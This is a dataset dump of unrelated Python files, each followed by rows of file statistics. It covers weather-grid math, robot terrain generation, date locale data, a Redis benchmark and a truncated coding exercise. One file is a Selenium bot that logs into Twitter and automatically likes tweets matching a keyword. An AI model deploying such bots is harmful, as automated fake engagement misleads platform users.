a = -cosd*dxt-sind*dyt
beta = asin(a/mgradt)
frnto = .5*mgradt*(defr(V)*cos(2*beta)-div(V))
return frnto
def geo(z):
""" geostrophic wind from height
<div class=jython>
GEO ( S ) = [ - DDY (S) * const / CORL, DDX (S) * const / CORL ]
</div>
"""
return DerivedGridFactory.createGeostrophicWindVector(z)
def grad(S):
""" Gradient of a scalar
<div class=jython>
GRAD ( S ) = [ DDX ( S ), DDY ( S ) ]
</div>
"""
return vecr(ddx(S),ddy(S))
def gwfv(V, N=6):
"""
<div class=jython>
Horizontal smoothing using normally distributed weights
with theoretical response of 1/e for N * delta-x wave.
Increasing N increases the smoothing. (default N=6)
</div>
"""
return gwfs(V, N)
def inad(V1,V2):
""" Inertial advective wind
<div class=jython>
INAD ( V1, V2 ) = [ DOT ( V1, GRAD (u2) ),
DOT ( V1, GRAD (v2) ) ]
</div>
"""
return vecr(dot(V1,grad(ur(V2))),dot(V1,grad(vr(V2))))
def qvec(S,V):
""" Q-vector at a level ( K / m / s )
<div class=jython>
QVEC ( S, V ) = [ - ( DOT ( DVDX (V), GRAD (S) ) ),
- ( DOT ( DVDY (V), GRAD (S) ) ) ]
where S can be any thermal paramenter, usually THTA.
</div>
"""
grads = grad(S)
qvecu = newName(-dot(dvdx(V),grads),"qvecu")
qvecv = newName(-dot(dvdy(V),grads),"qvecv")
return vecr(qvecu,qvecv)
def qvcl(THTA,V):
""" Q-vector ( K / m / s )
<div class=jython>
QVCL ( THTA, V ) = ( 1/( D (THTA) / DP ) ) *
[ ( DOT ( DVDX (V), GRAD (THTA) ) ),
( DOT ( DVDY (V), GRAD (THTA) ) ) ]
</div>
"""
dtdp = GridMath.partial(THTA,2)
gradt = grad(THTA)
qvecudp = newName(quo(dot(dvdx(V),gradt),dtdp),"qvecudp")
qvecvdp = newName(quo(dot(dvdy(V),gradt),dtdp),"qvecvdp")
return vecr(qvecudp,qvecvdp)
def rectv(S, D=2):
"""
<div class=jython>
Apply a rectangular aperature smoothing to the grid points. The weighting
function is the product of the rectangular aperature diffraction function
in the x and y directions. D is the radius of influence in grid
increments, increasing D increases the smoothing. (default D=2)
</div>
"""
return GridUtil.smooth(S, "RECT", int(D))
def sm5v(V):
""" Smooth a scalar grid using a 5-point smoother (see sm5s)
"""
return sm5s(V)
def sm9v(V):
""" Smooth a scalar grid using a 9-point smoother (see sm9s)
"""
return sm9s(V)
def thrm(S, level1, level2, unit=None):
""" Thermal wind
<div class=jython>
THRM ( S ) = [ u (GEO(S)) (level1) - u (GEO(S)) (level2),
v (GEO(S)) (level1) - v (GEO(S)) (level2) ]
</div>
"""
return vldf(geo(S),level1,level2, unit)
def vadd(V1,V2):
""" add the components of 2 vectors
<div class=jython>
VADD (V1, V2) = [ u1+u2, v1+v2 ]
</div>
"""
return add(V1,V2)
def vecn(S1,S2):
""" Make a true north vector from two components
<div class=jython>
VECN ( S1, S2 ) = [ S1, S2 ]
</div>
"""
return makeTrueVector(S1,S2)
def vecr(S1,S2):
""" Make a vector from two components
<div class=jython>
VECR ( S1, S2 ) = [ S1, S2 ]
</div>
"""
return makeVector(S1,S2)
def vlav(V,level1,level2, unit=None):
""" calculate the vector layer average
<div class=jython>
VLDF(V) = [(u(level1) - u(level2))/2,
(v(level1) - v(level2))/2]
</div>
"""
return layerAverage(V, level1, level2, unit)
def vldf(V,level1,level2, unit=None):
""" calculate the vector layer difference
<div class=jython>
VLDF(V) = [u(level1) - u(level2),
v(level1) - v(level2)]
</div>
"""
return layerDiff(V,level1,level2, unit)
def vmul(V1,V2):
""" Multiply the components of 2 vectors
<div class=jython>
VMUL (V1, V2) = [ u1*u2, v1*v2 ]
</div>
"""
return mul(V1,V2)
def vquo(V1,V2):
""" Divide the components of 2 vectors
<div class=jython>
VQUO (V1, V2) = [ u1/u2, v1/v2 ]
</div>
"""
return quo(V1,V2)
def vsub(V1,V2):
""" subtract the components of 2 vectors
<div class=jython>
VSUB (V1, V2) = [ u1-u2, v1-v2 ]
</div>
"""
return sub(V1,V2)
def LPIndex(u, v, z, t, top, bottom, unit):
""" calculate the wind shear between discrete layers
<div class=jython>
LP = 7.268DUDZ + 0.718DTDN + 0.318DUDN - 2.52
</div>
"""
Z = windShear(u, v, z, top, bottom, unit)*7.268
uwind = getSliceAtLevel(u, top)
vwind = getSliceAtLevel(v, top)
temp = newUnit(getSliceAtLevel(t, top), "temperature", "celsius")
HT = sqrt(ddx(temp)*ddx(temp) + ddy(temp)*ddy(temp))*0.718
HU = (ddx(vwind) + ddy(uwind))*0.318
L = add(noUnit(Z), add(noUnit(HU), noUnit(HT)))
L = (L - 2.520)*(-0.59)
P= 1.0/(1.0 + GridMath.applyFunctionOverGridsExt(L,"exp"))
LP = setLevel(P ,top, unit)
return LP
def EllrodIndex(u, v, z, top, bottom, unit):
""" calculate the wind shear between discrete layers
<div class=jython>
EI = VWS X ( DEF + DIV)
</div>
"""
VWS = windShear(u, v, z, top, bottom, unit)*100.0
#
uwind = getSliceAtLevel(u, top)
vwind = getSliceAtLevel(v, top)
DIV = (ddx(uwind) + ddy(vwind))* (-1.0)
#
DSH = ddx(vwind) + ddy(uwind)
DST = ddx(uwind) - ddy(vwind)
DEF = sqrt(DSH * DSH + DST * DST)
EI = mul(noUnit(VWS), add(noUnit(DEF), noUnit(DIV)))
return setLevel(EI, top, unit)
| 26.75461 | 89 | 0.584721 | 2,684 | 18,862 | 4.100596 | 0.152385 | 0.044339 | 0.077594 | 0.018808 | 0.494821 | 0.429675 | 0.404052 | 0.350809 | 0.320462 | 0.276576 | 0 | 0.024786 | 0.264182 | 18,862 | 704 | 90 | 26.792614 | 0.768211 | 0.590658 | 0 | 0.078431 | 0 | 0 | 0.012306 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.382353 | false | 0 | 0 | 0 | 0.77451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5effb4acc4b4904be8e5099e47cd060230843fe | 2,376 | py | Python | app.py | DevilBit/Twitter-Bot | 6f1b285aeb5faf37906d575775a927e69a5321d6 | [
"MIT"
] | null | null | null | app.py | DevilBit/Twitter-Bot | 6f1b285aeb5faf37906d575775a927e69a5321d6 | [
"MIT"
] | null | null | null | app.py | DevilBit/Twitter-Bot | 6f1b285aeb5faf37906d575775a927e69a5321d6 | [
"MIT"
] | 1 | 2021-03-08T20:05:23.000Z | 2021-03-08T20:05:23.000Z | from selenium import webdriver #to get the browser
from selenium.webdriver.common.keys import Keys #to send key to browser
import getpass #to get password safely
import time #to pause the program
#a calss to store all twetter related objects and functions
class twitter_bot:
def __init__(self, username, password):
self.username = username
self.password = password
self.bot = webdriver.Firefox()
#login function
def login(self):
bot = self.bot
bot.get('https://twitter.com/login')
#sleep to wait for the browser to get the website
time.sleep(3)
email = bot.find_element_by_class_name('js-username-field') #get the email field
password = bot.find_element_by_class_name('js-password-field') #get the password field
#clear the email and password field just in case of autofill
email.clear()
password.clear()
#fill in email field
email.send_keys(self.username)
time.sleep(2)
#fill in password field
password.send_keys(self.password)
time.sleep(2)
#click the login button
bot.find_element_by_class_name("EdgeButtom--medium").click()
time.sleep(3)
def like_tweet(self, search):
bot = self.bot
#use keyword to search
bot.get('https://twitter.com/search?q=' + search + '&src=typd')
bot.implicitly_wait(3)
#get posts
for i in range(0, 30):
bot.execute_script('window.scrollTo(0, document.body.scrollHeight)')
time.sleep(10)
tweets = bot.find_elements_by_class_name('tweet')
links = [element.get_attribute('data-permalink-path') for element in tweets]
#like posts
for link in links:
bot.get('https://twitter.com/' + link)
try:
bot.find_element_by_class_name('HeartAnimation').click()
time.sleep(10)
except Exception as ex:
time.sleep(60)
if __name__ == '__main__':
username = input('Email: ')
password = getpass.getpass('Password: ')
search = input('Please enter keyword: ')
user = twitter_bot(username, password)
user.login()
time.sleep(10)
user.like_tweet(search)
| 34.941176 | 95 | 0.603114 | 295 | 2,376 | 4.718644 | 0.359322 | 0.051724 | 0.039511 | 0.045977 | 0.119971 | 0.074713 | 0.038793 | 0 | 0 | 0 | 0 | 0.010241 | 0.301347 | 2,376 | 67 | 96 | 35.462687 | 0.828313 | 0.170875 | 0 | 0.191489 | 0 | 0 | 0.140964 | 0.014308 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06383 | false | 0.170213 | 0.085106 | 0 | 0.170213 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d5f33371ef4b57ee6f5f8e58e37840bbabd0819e | 10,275 | py | Python | examples/pybullet/gym/pybullet_envs/minitaur/envs/env_randomizers/minitaur_terrain_randomizer.py | felipeek/bullet3 | 6a59241074720e9df119f2f86bc01765917feb1e | [
"Zlib"
] | 9,136 | 2015-01-02T00:41:45.000Z | 2022-03-31T15:30:02.000Z | examples/pybullet/gym/pybullet_envs/minitaur/envs/env_randomizers/minitaur_terrain_randomizer.py | felipeek/bullet3 | 6a59241074720e9df119f2f86bc01765917feb1e | [
"Zlib"
] | 2,424 | 2015-01-05T08:55:58.000Z | 2022-03-30T19:34:55.000Z | examples/pybullet/gym/pybullet_envs/minitaur/envs/env_randomizers/minitaur_terrain_randomizer.py | felipeek/bullet3 | 6a59241074720e9df119f2f86bc01765917feb1e | [
"Zlib"
] | 2,921 | 2015-01-02T10:19:30.000Z | 2022-03-31T02:48:42.000Z | """Generates a random terrain at Minitaur gym environment reset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
parentdir = os.path.dirname(os.path.dirname(parentdir))
os.sys.path.insert(0, parentdir)
import itertools
import math
import enum
import numpy as np
from pybullet_envs.minitaur.envs import env_randomizer_base
_GRID_LENGTH = 15
_GRID_WIDTH = 10
_MAX_SAMPLE_SIZE = 30
_MIN_BLOCK_DISTANCE = 0.7
_MAX_BLOCK_LENGTH = _MIN_BLOCK_DISTANCE
_MIN_BLOCK_LENGTH = _MAX_BLOCK_LENGTH / 2
_MAX_BLOCK_HEIGHT = 0.05
_MIN_BLOCK_HEIGHT = _MAX_BLOCK_HEIGHT / 2
class PoissonDisc2D(object):
"""Generates 2D points using Poisson disk sampling method.
Implements the algorithm described in:
http://www.cs.ubc.ca/~rbridson/docs/bridson-siggraph07-poissondisk.pdf
Unlike the uniform sampling method that creates small clusters of points,
Poisson disk method enforces the minimum distance between points and is more
suitable for generating a spatial distribution of non-overlapping objects.
"""
def __init__(self, grid_length, grid_width, min_radius, max_sample_size):
"""Initializes the algorithm.
Args:
grid_length: The length of the bounding square in which points are
sampled.
grid_width: The width of the bounding square in which points are
sampled.
min_radius: The minimum distance between any pair of points.
max_sample_size: The maximum number of sample points around a active site.
See details in the algorithm description.
"""
self._cell_length = min_radius / math.sqrt(2)
self._grid_length = grid_length
self._grid_width = grid_width
self._grid_size_x = int(grid_length / self._cell_length) + 1
self._grid_size_y = int(grid_width / self._cell_length) + 1
self._min_radius = min_radius
self._max_sample_size = max_sample_size
# Flattern the 2D grid as an 1D array. The grid is used for fast nearest
# point searching.
self._grid = [None] * self._grid_size_x * self._grid_size_y
# Generate the first sample point and set it as an active site.
first_sample = np.array(np.random.random_sample(2)) * [grid_length, grid_width]
self._active_list = [first_sample]
# Also store the sample point in the grid.
self._grid[self._point_to_index_1d(first_sample)] = first_sample
def _point_to_index_1d(self, point):
"""Computes the index of a point in the grid array.
Args:
point: A 2D point described by its coordinates (x, y).
Returns:
The index of the point within the self._grid array.
"""
return self._index_2d_to_1d(self._point_to_index_2d(point))
def _point_to_index_2d(self, point):
"""Computes the 2D index (aka cell ID) of a point in the grid.
Args:
point: A 2D point (list) described by its coordinates (x, y).
Returns:
x_index: The x index of the cell the point belongs to.
y_index: The y index of the cell the point belongs to.
"""
x_index = int(point[0] / self._cell_length)
y_index = int(point[1] / self._cell_length)
return x_index, y_index
def _index_2d_to_1d(self, index2d):
"""Converts the 2D index to the 1D position in the grid array.
Args:
index2d: The 2D index of a point (aka the cell ID) in the grid.
Returns:
The 1D position of the cell within the self._grid array.
"""
return index2d[0] + index2d[1] * self._grid_size_x
def _is_in_grid(self, point):
"""Checks if the point is inside the grid boundary.
Args:
point: A 2D point (list) described by its coordinates (x, y).
Returns:
Whether the point is inside the grid.
"""
return (0 <= point[0] < self._grid_length) and (0 <= point[1] < self._grid_width)
def _is_in_range(self, index2d):
"""Checks if the cell ID is within the grid.
Args:
index2d: The 2D index of a point (aka the cell ID) in the grid.
Returns:
Whether the cell (2D index) is inside the grid.
"""
return (0 <= index2d[0] < self._grid_size_x) and (0 <= index2d[1] < self._grid_size_y)
def _is_close_to_existing_points(self, point):
"""Checks if the point is close to any already sampled (and stored) points.
Args:
point: A 2D point (list) described by its coordinates (x, y).
Returns:
True iff the distance of the point to any existing points is smaller than
the min_radius
"""
px, py = self._point_to_index_2d(point)
# Now we can check nearby cells for existing points
for neighbor_cell in itertools.product(xrange(px - 1, px + 2), xrange(py - 1, py + 2)):
if not self._is_in_range(neighbor_cell):
continue
maybe_a_point = self._grid[self._index_2d_to_1d(neighbor_cell)]
if maybe_a_point is not None and np.linalg.norm(maybe_a_point - point) < self._min_radius:
return True
return False
def sample(self):
"""Samples new points around some existing point.
Removes the sampling base point and also stores the new jksampled points if
they are far enough from all existing points.
"""
active_point = self._active_list.pop()
for _ in xrange(self._max_sample_size):
# Generate random points near the current active_point between the radius
random_radius = np.random.uniform(self._min_radius, 2 * self._min_radius)
random_angle = np.random.uniform(0, 2 * math.pi)
# The sampled 2D points near the active point
sample = random_radius * np.array([np.cos(random_angle),
np.sin(random_angle)]) + active_point
if not self._is_in_grid(sample):
continue
if self._is_close_to_existing_points(sample):
continue
self._active_list.append(sample)
self._grid[self._point_to_index_1d(sample)] = sample
def generate(self):
"""Generates the Poisson disc distribution of 2D points.
Although the while loop looks scary, the algorithm is in fact O(N), where N
is the number of cells within the grid. When we sample around a base point
(in some base cell), new points will not be pushed into the base cell
because of the minimum distance constraint. Once the current base point is
removed, all future searches cannot start from within the same base cell.
Returns:
All sampled points. The points are inside the quare [0, grid_length] x [0,
grid_width]
"""
while self._active_list:
self.sample()
all_sites = []
for p in self._grid:
if p is not None:
all_sites.append(p)
return all_sites
class TerrainType(enum.Enum):
"""The randomzied terrain types we can use in the gym env."""
RANDOM_BLOCKS = 1
TRIANGLE_MESH = 2
class MinitaurTerrainRandomizer(env_randomizer_base.EnvRandomizerBase):
"""Generates an uneven terrain in the gym env."""
def __init__(self,
terrain_type=TerrainType.TRIANGLE_MESH,
mesh_filename="robotics/reinforcement_learning/minitaur/envs/testdata/"
"triangle_mesh_terrain/terrain9735.obj",
mesh_scale=None):
"""Initializes the randomizer.
Args:
terrain_type: Whether to generate random blocks or load a triangle mesh.
mesh_filename: The mesh file to be used. The mesh will only be loaded if
terrain_type is set to TerrainType.TRIANGLE_MESH.
mesh_scale: the scaling factor for the triangles in the mesh file.
"""
self._terrain_type = terrain_type
self._mesh_filename = mesh_filename
self._mesh_scale = mesh_scale if mesh_scale else [1.0, 1.0, 0.3]
def randomize_env(self, env):
"""Generate a random terrain for the current env.
Args:
env: A minitaur gym environment.
"""
if self._terrain_type is TerrainType.TRIANGLE_MESH:
self._load_triangle_mesh(env)
if self._terrain_type is TerrainType.RANDOM_BLOCKS:
self._generate_convex_blocks(env)
def _load_triangle_mesh(self, env):
"""Represents the random terrain using a triangle mesh.
It is possible for Minitaur leg to stuck at the common edge of two triangle
pieces. To prevent this from happening, we recommend using hard contacts
(or high stiffness values) for Minitaur foot in sim.
Args:
env: A minitaur gym environment.
"""
env.pybullet_client.removeBody(env.ground_id)
terrain_collision_shape_id = env.pybullet_client.createCollisionShape(
shapeType=env.pybullet_client.GEOM_MESH,
fileName=self._mesh_filename,
flags=1,
meshScale=self._mesh_scale)
env.ground_id = env.pybullet_client.createMultiBody(
baseMass=0, baseCollisionShapeIndex=terrain_collision_shape_id, basePosition=[0, 0, 0])
def _generate_convex_blocks(self, env):
"""Adds random convex blocks to the flat ground.
We use the Possion disk algorithm to add some random blocks on the ground.
Possion disk algorithm sets the minimum distance between two sampling
points, thus voiding the clustering effect in uniform N-D distribution.
Args:
env: A minitaur gym environment.
"""
poisson_disc = PoissonDisc2D(_GRID_LENGTH, _GRID_WIDTH, _MIN_BLOCK_DISTANCE, _MAX_SAMPLE_SIZE)
block_centers = poisson_disc.generate()
for center in block_centers:
# We want the blocks to be in front of the robot.
shifted_center = np.array(center) - [2, _GRID_WIDTH / 2]
# Do not place blocks near the point [0, 0], where the robot will start.
if abs(shifted_center[0]) < 1.0 and abs(shifted_center[1]) < 1.0:
continue
half_length = np.random.uniform(_MIN_BLOCK_LENGTH, _MAX_BLOCK_LENGTH) / (2 * math.sqrt(2))
half_height = np.random.uniform(_MIN_BLOCK_HEIGHT, _MAX_BLOCK_HEIGHT) / 2
box_id = env.pybullet_client.createCollisionShape(
env.pybullet_client.GEOM_BOX, halfExtents=[half_length, half_length, half_height])
env.pybullet_client.createMultiBody(
baseMass=0,
baseCollisionShapeIndex=box_id,
basePosition=[shifted_center[0], shifted_center[1], half_height])
| 35.309278 | 98 | 0.706667 | 1,519 | 10,275 | 4.553654 | 0.21264 | 0.021975 | 0.013156 | 0.007518 | 0.237675 | 0.183895 | 0.127078 | 0.061443 | 0.052479 | 0.040335 | 0 | 0.013917 | 0.21674 | 10,275 | 290 | 99 | 35.431034 | 0.845552 | 0.42219 | 0 | 0.034188 | 1 | 0 | 0.016667 | 0.016667 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.076923 | 0 | 0.299145 | 0.008547 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5fb061a3a4378d9720ff3a451d5983678f6ed08 | 2,712 | py | Python | venv/lib/python3.8/site-packages/dateparser/data/date_translation_data/ebu.py | yuta-komura/vishnu | 67173b674d5f4f3be189474103612447ef69ab44 | [
"MIT"
] | 1 | 2021-11-17T04:55:14.000Z | 2021-11-17T04:55:14.000Z | dateparser/data/date_translation_data/ebu.py | cool-RR/dateparser | c38336df521cc57d947dc2c9111539a72f801652 | [
"BSD-3-Clause"
] | null | null | null | dateparser/data/date_translation_data/ebu.py | cool-RR/dateparser | c38336df521cc57d947dc2c9111539a72f801652 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
info = {
"name": "ebu",
"date_order": "DMY",
"january": [
"mweri wa mbere",
"mbe"
],
"february": [
"mweri wa kaĩri",
"kai"
],
"march": [
"mweri wa kathatũ",
"kat"
],
"april": [
"mweri wa kana",
"kan"
],
"may": [
"mweri wa gatano",
"gat"
],
"june": [
"mweri wa gatantatũ",
"gan"
],
"july": [
"mweri wa mũgwanja",
"mug"
],
"august": [
"mweri wa kanana",
"knn"
],
"september": [
"mweri wa kenda",
"ken"
],
"october": [
"mweri wa ikũmi",
"iku"
],
"november": [
"mweri wa ikũmi na ũmwe",
"imw"
],
"december": [
"mweri wa ikũmi na kaĩrĩ",
"igi"
],
"monday": [
"njumatatu",
"tat"
],
"tuesday": [
"njumaine",
"ine"
],
"wednesday": [
"njumatano",
"tan"
],
"thursday": [
"aramithi",
"arm"
],
"friday": [
"njumaa",
"maa"
],
"saturday": [
"njumamothii",
"nmm"
],
"sunday": [
"kiumia",
"kma"
],
"am": [
"ki"
],
"pm": [
"ut"
],
"year": [
"mwaka"
],
"month": [
"mweri"
],
"week": [
"kiumia"
],
"day": [
"mũthenya"
],
"hour": [
"ithaa"
],
"minute": [
"ndagĩka"
],
"second": [
"sekondi"
],
"relative-type": {
"1 year ago": [
"last year"
],
"0 year ago": [
"this year"
],
"in 1 year": [
"next year"
],
"1 month ago": [
"last month"
],
"0 month ago": [
"this month"
],
"in 1 month": [
"next month"
],
"1 week ago": [
"last week"
],
"0 week ago": [
"this week"
],
"in 1 week": [
"next week"
],
"1 day ago": [
"ĩgoro"
],
"0 day ago": [
"ũmũnthĩ"
],
"in 1 day": [
"rũciũ"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 second ago": [
"now"
]
},
"locale_specific": {},
"skip": [
" ",
".",
",",
";",
"-",
"/",
"'",
"|",
"@",
"[",
"]",
","
]
}
| 15.859649 | 34 | 0.289823 | 188 | 2,712 | 4.170213 | 0.537234 | 0.107143 | 0.045918 | 0.035714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012559 | 0.530236 | 2,712 | 170 | 35 | 15.952941 | 0.602826 | 0.007743 | 0 | 0.248521 | 0 | 0 | 0.31759 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5fcff660972d9337742f70ae81e7f0f26eaadac | 310 | py | Python | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from setuptools import setup, find_packages
setup(name='awspk',
version='0.1',
description='A aws cli pen knife with loads of interested stuff',
author='Martin Farrow',
author_email='awspk@dibley.net',
py_modules=['awspk'],
license='LICENSE',
)
| 23.846154 | 71 | 0.651613 | 40 | 310 | 4.975 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012346 | 0.216129 | 310 | 12 | 72 | 25.833333 | 0.806584 | 0.067742 | 0 | 0 | 0 | 0 | 0.34375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5fe5092d56595790c2072c2485827d644f9fbac | 1,104 | py | Python | NetCatKS/DProtocol/api/interfaces/subscribers/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | NetCatKS/DProtocol/api/interfaces/subscribers/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | NetCatKS/DProtocol/api/interfaces/subscribers/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | __author__ = 'dimd'
from zope.interface import Interface, Attribute
class IBaseResourceSubscriber(Interface):
"""
IBaseResourceSubscriber provides functionality for comparison of the signature on
a incoming request against a candidate DProtocol implementation registered as
IJSONResource
The `adapter` is our first argument in the constructor. It's used from the adapter pattern
and have to be from type IJSONResource
The `protocol` attribute is designed to be provided by classes which are implements IJSONResourceSubscriber,
or inherit from DProtocolSubscriber. If subclass does not provide the protocol argument will
raise AttributeError.
"""
adapter = Attribute("The implementer have to provide implementation of IJSONResource")
protocol = Attribute("DProtocol instance")
def compare():
"""
Designed to compare the the adapter and the DProtocol signature
if the signatures is equal
"""
class IJSONResourceSubscriber(Interface):
"""
"""
class IXMLResourceSubscriber(Interface):
"""
""" | 26.285714 | 112 | 0.729167 | 120 | 1,104 | 6.675 | 0.583333 | 0.037453 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216486 | 1,104 | 42 | 113 | 26.285714 | 0.926012 | 0.570652 | 0 | 0 | 0 | 0 | 0.221354 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
9104fd2a412765ae4aa352d6517c087a930d10a7 | 2,304 | py | Python | Extras/benchmark/simple-benchmark.py | yunhaom94/redis-writeanywhere | 1fefed820811fb89585b2b153d916c3b0fa507a6 | [
"BSD-3-Clause"
] | null | null | null | Extras/benchmark/simple-benchmark.py | yunhaom94/redis-writeanywhere | 1fefed820811fb89585b2b153d916c3b0fa507a6 | [
"BSD-3-Clause"
] | null | null | null | Extras/benchmark/simple-benchmark.py | yunhaom94/redis-writeanywhere | 1fefed820811fb89585b2b153d916c3b0fa507a6 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python3
import random
import string
import time
import subprocess
import os
import redis
import threading
def generate_string(string_size, size, dict):
'''
https://stackoverflow.com/questions/16308989/fastest-method-to-generate-big-random-string-with-lower-latin-letters
'''
for i in range(size):
min_lc = ord(b'a')
len_lc = 26
key = bytearray(random.getrandbits(8*string_size).to_bytes(string_size, 'big'))
for i, b in enumerate(key):
key[i] = min_lc + b % len_lc # convert 0..255 to 97..122
key = key.decode()
val = key
dict[key] = val
if __name__ == "__main__":
size = 1000 # TODO: make is an command line argument
port = 7000
FNULL = open(os.devnull, 'w')
string_size = 100000
partition = int(size/4)
print("generating test sets")
d1 = {}
d2 = {}
d3 = {}
d4 = {}
t1 = threading.Thread(target=generate_string, args = (string_size, partition, d1))
t2 = threading.Thread(target=generate_string, args = (string_size, partition, d2))
t3 = threading.Thread(target=generate_string, args = (string_size, partition, d3))
t4 = threading.Thread(target=generate_string, args = (string_size, partition, d4))
t1.start()
t2.start()
t3.start()
t4.start()
t1.join()
t1.join()
t1.join()
t1.join()
test_set = {}
test_set.update(d1)
test_set.update(d2)
test_set.update(d3)
test_set.update(d4)
print(len(test_set))
print("running tests...")
r = redis.StrictRedis(host='localhost', port=port, db=0)
start = time.time()
print("testing set")
for k,v in test_set.items():
r.set(k, v)
r.wait(3, 0)
print("testing get")
for k,v in test_set.items():
r.get(k)
r.wait(3, 0)
end = time.time()
runtime = end - start
ops = size * 2
throughput = float(ops/runtime)
latency = float(1/throughput)
print("total run time: {runtime}s \n\
number of total operations with 50% Set and 50% Get: {ops} \n\
avg. throughput: {throughput} ops/s \n\
avg. latency: {latency} s".format(
runtime=runtime,
ops=ops,
throughput=throughput,
latency=latency
))
| 22.368932 | 118 | 0.598524 | 313 | 2,304 | 4.297125 | 0.399361 | 0.05948 | 0.062454 | 0.086245 | 0.220074 | 0.220074 | 0.20223 | 0.20223 | 0.172491 | 0 | 0 | 0.042062 | 0.267361 | 2,304 | 102 | 119 | 22.588235 | 0.754739 | 0.085503 | 0 | 0.112676 | 1 | 0 | 0.038314 | 0 | 0 | 0 | 0 | 0.009804 | 0 | 1 | 0.014085 | false | 0 | 0.098592 | 0 | 0.112676 | 0.084507 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
910584bb0f10ffc80b6bcbf199bcc87aa47ac74d | 1,302 | py | Python | challenges/015-setintersection.py | Widdershin/CodeEval | c1c769363763d6f7e1ac5bf3707de2731c3bd926 | [
"MIT"
] | null | null | null | challenges/015-setintersection.py | Widdershin/CodeEval | c1c769363763d6f7e1ac5bf3707de2731c3bd926 | [
"MIT"
] | null | null | null | challenges/015-setintersection.py | Widdershin/CodeEval | c1c769363763d6f7e1ac5bf3707de2731c3bd926 | [
"MIT"
] | null | null | null | """
https://www.codeeval.com/browse/30/
Set Intersection
Challenge Description:
You are given two sorted list of numbers (ascending order). The lists
themselves are comma delimited and the two lists are semicolon
delimited. Print out the intersection of these two sets.
Input Sample:
File containing two lists of ascending order sorted integers, comma
delimited, one per line. E.g.
1,2,3,4;4,5,6
20,21,22;45,46,47
7,8,9;8,9,10,11,12
Output Sample:
Print out the ascending order sorted intersection of the two lists,
one per line. Print empty new line in case the lists have
no intersection. E.g.
4
8,9
"""
###### IO Boilerplate ######
import sys
if len(sys.argv) < 2:
input_file_name = "15-setintersection-in.txt"
else:
input_file_name = sys.argv[1]
with open(input_file_name) as input_file:
input_lines = map(lambda x: x.strip(), filter(lambda x: x != '', input_file.readlines()))
###### /IO Boilerplate ######
def main():
for line in input_lines:
string_sets = line.split(';')
